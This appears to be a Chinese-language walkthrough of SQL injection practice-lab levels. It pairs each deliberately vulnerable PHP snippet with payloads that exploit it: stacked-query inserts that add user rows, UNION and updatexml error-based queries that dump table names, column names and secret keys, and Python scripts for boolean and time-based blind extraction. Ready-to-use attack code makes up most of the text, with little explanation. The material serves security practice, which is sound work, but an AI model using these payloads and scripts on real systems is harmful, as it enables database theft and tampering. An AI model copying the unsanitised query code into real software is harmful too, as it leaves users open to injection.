login.phpfunction sqllogin($host,$dbuser,$dbpass, $dbname){   // connectivity//mysql connections for stacked query examples.$con1 = mysqli_connect($host,$dbuser,$dbpass, $dbname);      $username = mysqli_real_escape_string($con1, $_POST["login_user"]);   $password = $_POST["login_password"];   // Check connection   if (mysqli_connect_errno($con1))   {       echo "Failed to connect to MySQL: " . mysqli_connect_error();   }   else   {       @mysqli_select_db($con1, $dbname) or die ( "Unable to connect to the database ######: ");   }   /* execute multi query */      $sql = "SELECT * FROM users WHERE username='$username' and password='$password'";   if (@mysqli_multi_query($con1, $sql))   {        /* store first result set */      if($result = @mysqli_store_result($con1))      {    if($row = @mysqli_fetch_row($result))   {      if ($row[1])        {          return $row[1];      }       else        {          return 0;        }    }      }            else       {   echo '<font size="5" color= "#FFFF00">';    print_r(mysqli_error($con1));   echo "</font>";        }   }   else    {    echo '<font size="5" color= "#FFFF00">';    print_r(mysqli_error($con1));   echo "</font>";      }}


payloadlogin_password=1';insert into users values('42','laotun','123456')--+&login_user=1&mysubmit=Login





function sqllogin($host,$dbuser,$dbpass, $dbname){   // connectivity//mysql connections for stacked query examples.$con1 = mysqli_connect($host,$dbuser,$dbpass, $dbname);      $username = mysqli_real_escape_string($con1, $_POST["login_user"]);   $password = $_POST["login_password"];   // Check connection   if (mysqli_connect_errno($con1))   {       echo "Failed to connect to MySQL: " . mysqli_connect_error();   }   else   {       @mysqli_select_db($con1, $dbname) or die ( "Unable to connect to the database ######: ");   }   /* execute multi query */      $sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";   if (@mysqli_multi_query($con1, $sql))   {        /* store first result set */      if($result = @mysqli_store_result($con1))      {     if($row = @mysqli_fetch_row($result))   {      if ($row[1])        {          return $row[1];      }       else        {          return 0;        }    }      }            else       {   echo '<font size="5" color= "#FFFF00">';    print_r(mysqli_error($con1));   echo "</font>";        }   }   else    {    echo '<font size="5" color= "#FFFF00">';    print_r(mysqli_error($con1));   echo "</font>";      }}


payloadlogin_password=1');insert into users values('43','laotun','123456')--+&login_user=1&mysubmit=Login





function sqllogin($host,$dbuser,$dbpass, $dbname){   // connectivity//mysql connections for stacked query examples.$con1 = mysqli_connect($host,$dbuser,$dbpass, $dbname);      $username = mysqli_real_escape_string($con1, $_POST["login_user"]);   $password = $_POST["login_password"];   // Check connection   if (mysqli_connect_errno($con1))   {       echo "Failed to connect to MySQL: " . mysqli_connect_error();   }   else   {       @mysqli_select_db($con1, $dbname) or die ( "Unable to connect to the database ######: ");   }   /* execute multi query */      $sql = "SELECT * FROM users WHERE username='$username' and password='$password'";   if (@mysqli_multi_query($con1, $sql))   {        /* store first result set */      if($result = @mysqli_store_result($con1))      {     if($row = @mysqli_fetch_row($result))   {      if ($row[1])        {          return $row[1];      }       else        {          return 0;        }    }      }          }}

这个与Less-42一样的,payloadlogin_password=1';insert into users values('44','laotun','123456')--+&login_user=1&mysubmit=Login




function sqllogin($host,$dbuser,$dbpass, $dbname){   // connectivity//mysql connections for stacked query examples.$con1 = mysqli_connect($host,$dbuser,$dbpass, $dbname);      $username = mysqli_real_escape_string($con1, $_POST["login_user"]);   $password = $_POST["login_password"];   // Check connection   if (mysqli_connect_errno($con1))   {       echo "Failed to connect to MySQL: " . mysqli_connect_error();   }   else   {       @mysqli_select_db($con1, $dbname) or die ( "Unable to connect to the database ######: ");   }   /* execute multi query */      $sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";   if (@mysqli_multi_query($con1, $sql))   {        /* store first result set */      if($result = @mysqli_store_result($con1))      {     if($row = @mysqli_fetch_row($result))   {      if ($row[1])        {          return $row[1];      }       else        {          return 0;        }    }      }          }}

这一关是在Less-44的基础上加个一个括号,闭合即可login_password=1');insert into users values('45','laotun','123456')--+&login_user=1&mysubmit=Login




$id=$_GET['sort'];  if(isset($id))  {   //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a');    fwrite($fp,'SORT:'.$id."\n");   fclose($fp);    $sql = "SELECT * FROM users ORDER BY $id";  $result = mysql_query($sql);    if ($result)        {       ?>      <center>        <font color= "#00FF00" size="4">                <table   border=1'>     <tr>            <th> ID </th>           <th> USERNAME   </th>           <th> PASSWORD   </th>       </tr>       </font>     </font>     <?php       while ($row = mysql_fetch_assoc($result))           {           echo '<font color= "#00FF11" size="3">';                    echo "<tr>";                echo "<td>".$row['id']."</td>";             echo "<td>".$row['username']."</td>";               echo "<td>".$row['password']."</td>";           echo "</tr>";           echo "</font>";         }           echo "</table>";                }       else        {       echo '<font color= "#FFFF00">';     print_r(mysql_error());     echo "</font>";         }   }

这一关考的是order by注入,这里可以使用报错注入,也可以使用布尔盲注






import requests url = ""flag = ''  def payload(i, j):    # 数据库名字    sql = "rand(ascii(substr(database(),%d,1))>%d)"%(i,j)    # 表名    #sql = "1')) and ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema=database()),%d,1))>%d--+"%(i,j)    # 列名    #sql = "1')) and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database()),%d,1))>%d--+"%(i,j)    # 查询flag    #sql = "1')) and ascii(substr((select password from users),%d,1))>%d--+"%(i,j)            #r = requests.post(url, data)    r = requests.request('GET', url % sql)    # print (r.url)    if "<font color= \"#00FF11\" size=\"3\"><tr><td>11</td><td>admin3</td><td>admin3</td></tr></font><font color= \"#00FF11\" size=\"3\"><tr><td>5</td><td>stupid</td><td>stupidity</td>" in r.text:        res = 1    else:        res = 0    return res  def exp():    global flag    for i in range(1, 10000):        low = 31        high = 127        while low <= high:            mid = (low + high) // 2            res = payload(i, mid)            if res:                low = mid + 1            else:                high = mid - 1        f = int((low + high + 1)) // 2        if (f == 127 or f == 31):            break        # print (f)        flag += chr(f)        print(flag)  exp()



$id=$_GET['sort'];  if(isset($id))  {   //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a');    fwrite($fp,'SORT:'.$id."\n");   fclose($fp);    $sql = "SELECT * FROM users ORDER BY '$id'";    $result = mysql_query($sql);    if ($result)        {       ?>      <center>        <font color= "#00FF00" size="4">                <table   border=1'>     <tr>            <th> ID </th>           <th> USERNAME   </th>           <th> PASSWORD   </th>       </tr>       </font>     </font>     <?php       while ($row = mysql_fetch_assoc($result))           {           echo '<font color= "#00FF11" size="3">';                    echo "<tr>";                echo "<td>".$row['id']."</td>";             echo "<td>".$row['username']."</td>";               echo "<td>".$row['password']."</td>";           echo "</tr>";           echo "</font>";         }           echo "</table>";                }   else        {       echo '<font color= "#FFFF00">';     print_r(mysql_error());     echo "</font>";         }   }



1'and (updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1))--+



$id=$_GET['sort'];  if(isset($id))  {   //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a');    fwrite($fp,'SORT:'.$id."\n");   fclose($fp);    $sql = "SELECT * FROM users ORDER BY $id";  $result = mysql_query($sql);    if ($result)        {       ?>      <center>        <font color= "#00FF00" size="4">                <table   border=1'>     <tr>            <th> ID </th>           <th> USERNAME   </th>           <th> PASSWORD   </th>       </tr>       </font>     </font>     <?php       while ($row = mysql_fetch_assoc($result))           {           echo '<font color= "#00FF11" size="3">';                    echo "<tr>";                echo "<td>".$row['id']."</td>";             echo "<td>".$row['username']."</td>";               echo "<td>".$row['password']."</td>";           echo "</tr>";           echo "</font>";         }           echo "</table>";                }   }


import requests url = ""flag = ''  def payload(i, j):    # 数据库名字    sql = "rand(ascii(substr(database(),%d,1))>%d)"%(i,j)    # 表名    #sql = "1')) and ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema=database()),%d,1))>%d--+"%(i,j)    # 列名    #sql = "1')) and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database()),%d,1))>%d--+"%(i,j)    # 查询flag    #sql = "1')) and ascii(substr((select password from users),%d,1))>%d--+"%(i,j)            #r = requests.post(url, data)    r = requests.request('GET', url % sql)    # print (r.url)    if "<font color= \"#00FF11\" size=\"3\"><tr><td>11</td><td>admin3</td><td>admin3</td></tr></font><font color= \"#00FF11\" size=\"3\"><tr><td>5</td><td>stupid</td><td>stupidity</td>" in r.text:        res = 1    else:        res = 0    return res  def exp():    global flag    for i in range(1, 10000):        low = 31        high = 127        while low <= high:            mid = (low + high) // 2            res = payload(i, mid)            if res:                low = mid + 1            else:                high = mid - 1        f = int((low + high + 1)) // 2        if (f == 127 or f == 31):            break        # print (f)        flag += chr(f)        print(flag)  exp()



$id=$_GET['sort'];  if(isset($id))  {   //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a');    fwrite($fp,'SORT:'.$id."\n");   fclose($fp);    $sql = "SELECT * FROM users ORDER BY '$id'";    $result = mysql_query($sql);    if ($result)        {       ?>      <center>        <font color= "#00FF00" size="4">                <table   border=1'>     <tr>            <th> ID </th>           <th> USERNAME   </th>           <th> PASSWORD   </th>       </tr>       </font>     </font>     <?php       while ($row = mysql_fetch_assoc($result))           {           echo '<font color= "#00FF11" size="3">';                    echo "<tr>";                echo "<td>".$row['id']."</td>";             echo "<td>".$row['username']."</td>";               echo "<td>".$row['password']."</td>";           echo "</tr>";           echo "</font>";         }           echo "</table>";                }   }


import requestsimport timeurl = ""flag = ''  def payload(i, j):    startTime=time.time()    # 数据库名字    sql = "1'and if(ascii(substr(database(),%d,1))>%d,sleep(5),-1)-- "%(i,j)    # 表名    #sql = "id = if(ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema=database()),%d,1))>%d,sleep(5),-1)%%23"%(i,j)    # 列名    #sql = "id = if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database()),%d,1))>%d,sleep(5),-1)%%23"%(i,j)    # 查询flag    #sql = "id = if(ascii(substr((select password from users),%d,1))>%d,sleep(5),-1)%%23"%(i,j)     try:        r = requests.get(url % sql, timeout=10)    except:        pass    # print (r.url)    if time.time()-startTime>5:        res = 1    else:        res = 0    return res  def exp():    global flag    for i in range(1, 10000):        low = 31        high = 127        while low <= high:            mid = (low + high) // 2            res = payload(i, mid)            if res:                low = mid + 1            else:                high = mid - 1        f = int((low + high + 1)) // 2        if (f == 127 or f == 31):            break        # print (f)        flag += chr(f)        print(flag)  exp()



$id=$_GET['sort'];  if(isset($id)){ //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a');    fwrite($fp,'SORT:'.$id."\n");   fclose($fp);    $sql="SELECT * FROM users ORDER BY $id";    /* execute multi query */   if (mysqli_multi_query($con1, $sql))    {       ?>      <center>        <font color= "#00FF00" size="4">                <table   border=1'>     <tr>            <th> ID </th>           <th> USERNAME   </th>           <th> PASSWORD   </th>       </tr>       </font>     </font>     <?php           /* store first result set */            if ($result = mysqli_store_result($con1))           {               while($row = mysqli_fetch_row($result))             {                   echo '<font color= "#00FF11" size="3">';                            echo "<tr>";                    echo "<td>";                    printf("%s", $row[0]);                  echo "</td>";                   echo "<td>";                    printf("%s", $row[1]);                  echo "</td>";                   echo "<td>";                    printf("%s", $row[2]);                  echo "</td>";                   echo "</tr>";                   echo "</font>";                                 }                           }   echo "</table>";    }   else    {       echo '<font color= "#FFFF00">';     print_r(mysqli_error($con1));       echo "</font>";     }}


1;insert into users values('50','laotun','123456')



$id=$_GET['sort'];  if(isset($id)){ //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a');    fwrite($fp,'SORT:'.$id."\n");   fclose($fp);    $sql="SELECT * FROM users ORDER BY '$id'";  /* execute multi query */   if (mysqli_multi_query($con1, $sql))    {       ?>      <center>        <font color= "#00FF00" size="4">                <table   border=1'>     <tr>            <th> ID </th>           <th> USERNAME   </th>           <th> PASSWORD   </th>       </tr>       </font>     </font>     <?php           /* store first result set */            if ($result = mysqli_store_result($con1))           {               while($row = mysqli_fetch_row($result))             {                   echo '<font color= "#00FF11" size="3">';                            echo "<tr>";                    echo "<td>";                    printf("%s", $row[0]);                  echo "</td>";                   echo "<td>";                    printf("%s", $row[1]);                  echo "</td>";                   echo "<td>";                    printf("%s", $row[2]);                  echo "</td>";                   echo "</tr>";                   echo "</font>";                                 }                           }   echo "</table>";    }   else    {       echo '<font color= "#FFFF00">';     print_r(mysqli_error($con1));       echo "</font>";     }}


1';insert into users values('51','laotun','123456')--+



$id=$_GET['sort'];  if(isset($id)){ //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a');    fwrite($fp,'SORT:'.$id."\n");   fclose($fp);    $sql="SELECT * FROM users ORDER BY $id";    /* execute multi query */   if (mysqli_multi_query($con1, $sql))    {       ?>      <center>        <font color= "#00FF00" size="4">                <table   border=1'>     <tr>            <th> ID </th>           <th> USERNAME   </th>           <th> PASSWORD   </th>       </tr>       </font>     </font>     <?php           /* store first result set */            if ($result = mysqli_store_result($con1))           {               while($row = mysqli_fetch_row($result))             {                   echo '<font color= "#00FF11" size="3">';                            echo "<tr>";                    echo "<td>";                    printf("%s", $row[0]);                  echo "</td>";                   echo "<td>";                    printf("%s", $row[1]);                  echo "</td>";                   echo "<td>";                    printf("%s", $row[2]);                  echo "</td>";                   echo "</tr>";                   echo "</font>";                                 }                           }   echo "</table>";    }}


1;insert into users values('52','laotun','123456')



$id=$_GET['sort'];  if(isset($id)){ //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a');    fwrite($fp,'SORT:'.$id."\n");   fclose($fp);    $sql="SELECT * FROM users ORDER BY '$id'";  /* execute multi query */   if (mysqli_multi_query($con1, $sql))    {       ?>      <center>        <font color= "#00FF00" size="4">                <table   border=1'>     <tr>            <th> ID </th>           <th> USERNAME   </th>           <th> PASSWORD   </th>       </tr>       </font>     </font>     <?php           /* store first result set */            if ($result = mysqli_store_result($con1))           {               while($row = mysqli_fetch_row($result))             {                   echo '<font color= "#00FF11" size="3">';                            echo "<tr>";                    echo "<td>";                    printf("%s", $row[0]);                  echo "</td>";                   echo "<td>";                    printf("%s", $row[1]);                  echo "</td>";                   echo "<td>";                    printf("%s", $row[2]);                  echo "</td>";                   echo "</tr>";                   echo "</font>";                                 }                           }   echo "</table>";    }}


1';insert into users values('53','laotun','123456')--+



if(isset($_GET['id']))      {           $id=$_GET['id'];                //logging the connection parameters to a file for analysis.         $fp=fopen('result.txt','a');            fwrite($fp,'ID:'.$id."\n");         fclose($fp);                            //update the counter in database            next_tryy();                        //Display attempts on screen.           $tryyy = view_attempts();           echo "You have made : ". $tryyy ." of $times attempts";         echo "<br><br><br>\n";                              //Reset the Database if you exceed allowed attempts.            if($tryyy >= ($times+1))            {               setcookie('challenge', ' ', time() - 3600000);              echo "<font size=4>You have exceeded maximum allowed attempts, Hence Challenge Has Been Reset </font><br>\n";               echo "Redirecting you to challenge page..........\n";               header( "refresh:3;url=../sql-connections/setup-db-challenge.php?id=$pag" );                echo "<br>\n";          }                                       // Querry DB to get the correct output          $sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";           $result=mysql_query($sql);          $row = mysql_fetch_array($result);          if($row)            {               echo '<font color= "#00FFFF">';                 echo 'Your Login name:'. $row['username'];              echo "<br>";                echo 'Your Password:' .$row['password'];                echo "</font>";         }           else            {               echo '<font color= "#FFFF00">';  //print_r(mysql_error());              echo "</font>";             }       }



20'union select 1,group_concat(table_name),3 from information_schema.columns where table_schema=database()--+




爆列20'union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database()--+


查询数据20'union select 1,secret_SCJK,3 from doejyhjijk--+




if(isset($_GET['id']))      {           $id=$_GET['id'];                //logging the connection parameters to a file for analysis.         $fp=fopen('result.txt','a');            fwrite($fp,'ID:'.$id."\n");         fclose($fp);                            //update the counter in database            next_tryy();                        //Display attempts on screen.           $tryyy = view_attempts();           echo "You have made : ". $tryyy ." of $times attempts";         echo "<br><br><br>\n";                              //Reset the Database if you exceed allowed attempts.                        if($tryyy >=($times+1))         {               setcookie('challenge', ' ', time() - 3600000);              echo "<font size=4>You have exceeded maximum allowed attempts, Hence Challenge Has Been Reset </font><br>\n";               echo "Redirecting you to challenge page..........\n";               echo "<br>\n";              header( "refresh:4;url=../sql-connections/setup-db-challenge.php?id=$pag" );            }                                       // Querry DB to get the correct output          $sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";           $result=mysql_query($sql);          $row = mysql_fetch_array($result);          if($row)            {               echo '<font color= "#00FFFF">';                 echo 'Your Login name:'. $row['username'];              echo "<br>";                echo 'Your Password:' .$row['password'];                echo "</font>";                         }           else            {               echo '<font color= "#FFFF00">';//               print_r(mysql_error());             echo "</font>";             }       }


爆表20)union select 1,group_concat(table_name),3 from information_schema.columns where table_schema=database()--+


爆列20)union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database()--+


查询key20)union select 1, secret_U0PJ,3 from 1etlst22aa--+



if(isset($_GET['id']))      {           $id=$_GET['id'];                //logging the connection parameters to a file for analysis.         $fp=fopen('result.txt','a');            fwrite($fp,'ID:'.$id."\n");         fclose($fp);                            //update the counter in database            next_tryy();                        //Display attempts on screen.           $tryyy = view_attempts();           echo "You have made : ". $tryyy ." of $times attempts";         echo "<br><br><br>\n";                              //Reset the Database if you exceed allowed attempts.                        if($tryyy >=($times+1))         {               setcookie('challenge', ' ', time() - 3600000);              echo "<font size=4>You have exceeded maximum allowed attempts, Hence Challenge Has Been Reset </font><br>\n";               echo "Redirecting you to challenge page..........\n";               header( "refresh:3;url=../sql-connections/setup-db-challenge.php?id=$pag" );                echo "<br>\n";          }                                           // Querry DB to get the correct output          $sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";         $result=mysql_query($sql);          $row = mysql_fetch_array($result);          if($row)            {               echo '<font color= "#00FFFF">';                 echo 'Your Login name:'. $row['username'];              echo "<br>";                echo 'Your Password:' .$row['password'];                echo "</font>";         }           else            {               echo '<font color= "#FFFF00">';//               print_r(mysql_error());             echo "</font>";             }       }


爆表20')union select 1,group_concat(table_name),3 from information_schema.columns where table_schema=database()--+


爆列20')union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database()--+


查询key20')union select 1,group_concat(secret_6E9J),3 from pfn2gwm7ps--+



if(isset($_GET['id']))      {           $id=$_GET['id'];                //logging the connection parameters to a file for analysis.         $fp=fopen('result.txt','a');            fwrite($fp,'ID:'.$id."\n");         fclose($fp);                            //update the counter in database            next_tryy();                        //Display attempts on screen.           $tryyy = view_attempts();           echo "You have made : ". $tryyy ." of $times attempts";         echo "<br><br><br>\n";                              //Reset the Database if you exceed allowed attempts.                        if($tryyy >=($times+1))         {               setcookie('challenge', ' ', time() - 3600000);              echo "<font size=4>You have exceeded maximum allowed attempts, Hence Challenge Has Been Reset </font><br>\n";               echo "Redirecting you to challenge page..........\n";               header( "refresh:3;url=../sql-connections/setup-db-challenge.php?id=$pag" );                echo "<br>\n";          }                               $id= '"'.$id.'"';           // Querry DB to get the correct output          $sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";         $result=mysql_query($sql);          $row = mysql_fetch_array($result);          if($row)            {               echo '<font color= "#00FFFF">';                 echo 'Your Login name:'. $row['username'];              echo "<br>";                echo 'Your Password:' .$row['password'];                echo "</font>";         }           else            {               echo '<font color= "#FFFF00">';//               print_r(mysql_error());             echo "</font>";             }       }



payload20"union select 1,group_concat(table_name),group_concat(column_name) from information_schema.columns where table_schema=database()--+


查询key20"union select 1, secret_6E9J,3 from pfn2gwm7ps--+



if(isset($_GET['id']))      {           $id=$_GET['id'];                //logging the connection parameters to a file for analysis.         $fp=fopen('result.txt','a');            fwrite($fp,'ID:'.$id."\n");         fclose($fp);                            //update the counter in database            next_tryy();                        //Display attempts on screen.           $tryyy = view_attempts();           echo "You have made : ". $tryyy ." of $times attempts";         echo "<br><br><br>\n";                              //Reset the Database if you exceed allowed attempts.            if($tryyy >= ($times+1))            {               setcookie('challenge', ' ', time() - 3600000);              echo "<font size=4>You have exceeded maximum allowed attempts, Hence Challenge Has Been Reset </font><br>\n";               echo "Redirecting you to challenge page..........\n";               header( "refresh:3;url=../sql-connections/setup-db-challenge.php?id=$pag" );                echo "<br>\n";          }                                       // Querry DB to get the correct output          $sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";           $result=mysql_query($sql);          $row = mysql_fetch_array($result);          if($row)            {               echo '<font color= "#00FFFF">';                 $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");               $pass = array_reverse($unames);             echo 'Your Login name : '. $unames[$row['id']];             echo "<br>";                echo 'Your Password : ' .$pass[$row['id']];             echo "</font>";         }           else            {               echo '<font color= "#FFFF00">';             print_r(mysql_error());             echo "</font>";             }       }

执行 sql 语句后,并没有返回数据库当中的数据,所以我们这里不能使用 union 联合注入, 这里使用报错注入。

爆表2'and updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1)--+


爆列2'and updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like(database())),0x7e),1)--+


查询key2'and updatexml(1,concat(0x7e,(select(group_concat(secret_U5X2))from(3ix3008tpb)),0x7e),1)--+



if(isset($_GET['id']))      {           $id=$_GET['id'];                //logging the connection parameters to a file for analysis.         $fp=fopen('result.txt','a');            fwrite($fp,'ID:'.$id."\n");         fclose($fp);                            //update the counter in database            next_tryy();                        //Display attempts on screen.           $tryyy = view_attempts();           echo "You have made : ". $tryyy ." of $times attempts";         echo "<br><br><br>\n";                              //Reset the Database if you exceed allowed attempts.            if($tryyy >= ($times+1))            {               setcookie('challenge', ' ', time() - 3600000);              echo "<font size=4>You have exceeded maximum allowed attempts, Hence Challenge Has Been Reset </font><br>\n";               echo "Redirecting you to challenge page..........\n";               header( "refresh:3;url=../sql-connections/setup-db-challenge.php?id=$pag" );                echo "<br>\n";          }                                       // Querry DB to get the correct output          $sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";         $result=mysql_query($sql);          $row = mysql_fetch_array($result);          if($row)            {               echo '<font color= "#00FFFF">';                 $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");               $pass = array_reverse($unames);             echo 'Your Login name : '. $unames[$row['id']];             echo "<br>";                echo 'Your Password : ' .$pass[$row['id']];             echo "</font>";         }           else            {               echo '<font color= "#FFFF00">';             print_r(mysql_error());             echo "</font>";             }       }


爆表2 and updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1)--+


爆列2 and updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like(database())),0x7e),1)--+


查询key2 and updatexml(1,concat(0x7e,(select(group_concat(secret_E9IK))from(a226u6ahlu)),0x7e),1)--+



if(isset($_GET['id']))      {           $id=$_GET['id'];                //logging the connection parameters to a file for analysis.         $fp=fopen('result.txt','a');            fwrite($fp,'ID:'.$id."\n");         fclose($fp);                            //update the counter in database            next_tryy();                        //Display attempts on screen.           $tryyy = view_attempts();           echo "You have made : ". $tryyy ." of $times attempts";         echo "<br><br><br>\n";                              //Reset the Database if you exceed allowed attempts.            if($tryyy >= ($times+1))            {               setcookie('challenge', ' ', time() - 3600000);              echo "<font size=4>You have exceeded maximum allowed attempts, Hence Challenge Has Been Reset </font><br>\n";               echo "Redirecting you to challenge page..........\n";               header( "refresh:3;url=../sql-connections/setup-db-challenge.php?id=$pag" );                echo "<br>\n";          }                               $id = '("'.$id.'")';            // Querry DB to get the correct output          $sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";         $result=mysql_query($sql);          $row = mysql_fetch_array($result);          if($row)            {               echo '<font color= "#00FFFF">';                 $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");               $pass = array_reverse($unames);             echo 'Your Login name : '. $unames[$row['id']];             echo "<br>";                echo 'Your Password : ' .$pass[$row['id']];             echo "</font>";         }           else            {               echo '<font color= "#FFFF00">';             print_r(mysql_error());             echo "</font>";             }       }

这一关是用双引号和括号包裹了起来,$id = '("'.$id.'")';,与上一关类似,绕过

payload2")and updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1)--+



if(isset($_GET['id']))      {           $id=$_GET['id'];                //logging the connection parameters to a file for analysis.         $fp=fopen('result.txt','a');            fwrite($fp,'ID:'.$id."\n");         fclose($fp);                            //update the counter in database            next_tryy();                        //Display attempts on screen.           $tryyy = view_attempts();           echo "You have made : ". $tryyy ." of $times attempts";         echo "<br><br><br>\n";                              //Reset the Database if you exceed allowed attempts.            if($tryyy >= ($times+1))            {               setcookie('challenge', ' ', time() - 3600000);              echo "<font size=4>You have exceeded maximum allowed attempts, Hence Challenge Has Been Reset </font><br>\n";               echo "Redirecting you to challenge page..........\n";               header( "refresh:3;url=../sql-connections/setup-db-challenge.php?id=$pag" );                echo "<br>\n";          }                                           // Querry DB to get the correct output          $sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";           $result=mysql_query($sql);          $row = mysql_fetch_array($result);          if($row)            {               echo '<font color= "#00FFFF">';                 $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");               $pass = array_reverse($unames);             echo 'Your Login name : '. $unames[$row['id']];             echo "<br>";                echo 'Your Password : ' .$pass[$row['id']];             echo "</font>";         }           else            {               echo '<font color= "#FFFF00">';             print_r(mysql_error());             echo "</font>";             }       }


1'))and updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1)--+



if(isset($_GET['id']))      {           $id=$_GET['id'];                //logging the connection parameters to a file for analysis.         $fp=fopen('result.txt','a');            fwrite($fp,'ID:'.$id."\n");         fclose($fp);                            //update the counter in database            next_tryy();                        //Display attempts on screen.           $tryyy = view_attempts();           echo "You have made : ". $tryyy ." of $times attempts";         echo "<br><br><br>\n";                              //Reset the Database if you exceed allowed attempts.            if($tryyy >= ($times+1))            {               setcookie('challenge', ' ', time() - 3600000);              echo "<font size=4>You have exceeded maximum allowed attempts, Hence Challenge Has Been Reset </font><br>\n";               echo "Redirecting you to challenge page..........\n";               header( "refresh:3;url=../sql-connections/setup-db-challenge.php?id=$pag" );                echo "<br>\n";          }                                           // Querry DB to get the correct output          $sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";         $result=mysql_query($sql);          $row = mysql_fetch_array($result);          if($row)            {               echo '<font color= "#00FFFF">';                 $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");               $pass = array_reverse($unames);             echo 'Your Login name : '. $unames[$row['id']];             echo "<br>";                echo 'Your Password : ' .$pass[$row['id']];             echo "</font>";         }           else            {               echo '<font color= "#FFFF00">';//               print_r(mysql_error());             echo "</font>";             }       }


import requestsimport timeurl = ""flag = ''  def payload(i, j):    startTime=time.time()    # 数据库名字    sql = "1')and if(ascii(substr(database(),%d,1))>%d,sleep(5),-1)-- "%(i,j)    # 表名    #sql = "id = if(ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema=database()),%d,1))>%d,sleep(5),-1)%%23"%(i,j)    # 列名    #sql = "id = if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database()),%d,1))>%d,sleep(5),-1)%%23"%(i,j)    # 查询flag    #sql = "id = if(ascii(substr((select password from users),%d,1))>%d,sleep(5),-1)%%23"%(i,j)     try:        r = requests.get(url % sql, timeout=10)    except:        pass    # print (r.url)    if time.time()-startTime>5:        res = 1    else:        res = 0    return res  def exp():    global flag    for i in range(1, 10000):        low = 31        high = 127        while low <= high:            mid = (low + high) // 2            res = payload(i, mid)            if res:                low = mid + 1            else:                high = mid - 1        f = int((low + high + 1)) // 2        if (f == 127 or f == 31):            break        # print (f)        flag += chr(f)        print(flag)  exp()



if(isset($_GET['id']))      {           $id=$_GET['id'];                //logging the connection parameters to a file for analysis.         $fp=fopen('result.txt','a');            fwrite($fp,'ID:'.$id."\n");         fclose($fp);                            //update the counter in database            next_tryy();                        //Display attempts on screen.           $tryyy = view_attempts();           echo "You have made : ". $tryyy ." of $times attempts";         echo "<br><br><br>\n";                              //Reset the Database if you exceed allowed attempts.            if($tryyy >= ($times+1))            {               setcookie('challenge', ' ', time() - 3600000);              echo "<font size=4>You have exceeded maximum allowed attempts, Hence Challenge Has Been Reset </font><br>\n";               echo "Redirecting you to challenge page..........\n";               header( "refresh:3;url=../sql-connections/setup-db-challenge.php?id=$pag" );                echo "<br>\n";          }                                           // Querry DB to get the correct output          $sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";           $result=mysql_query($sql);          $row = mysql_fetch_array($result);          if($row)            {               echo '<font color= "#00FFFF">';                 $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");               $pass = array_reverse($unames);             echo 'Your Login name : '. $unames[$row['id']];             echo "<br>";                echo 'Your Password : ' .$pass[$row['id']];             echo "</font>";         }           else            {               echo '<font color= "#FFFF00">';//               print_r(mysql_error());             echo "</font>";             }       }


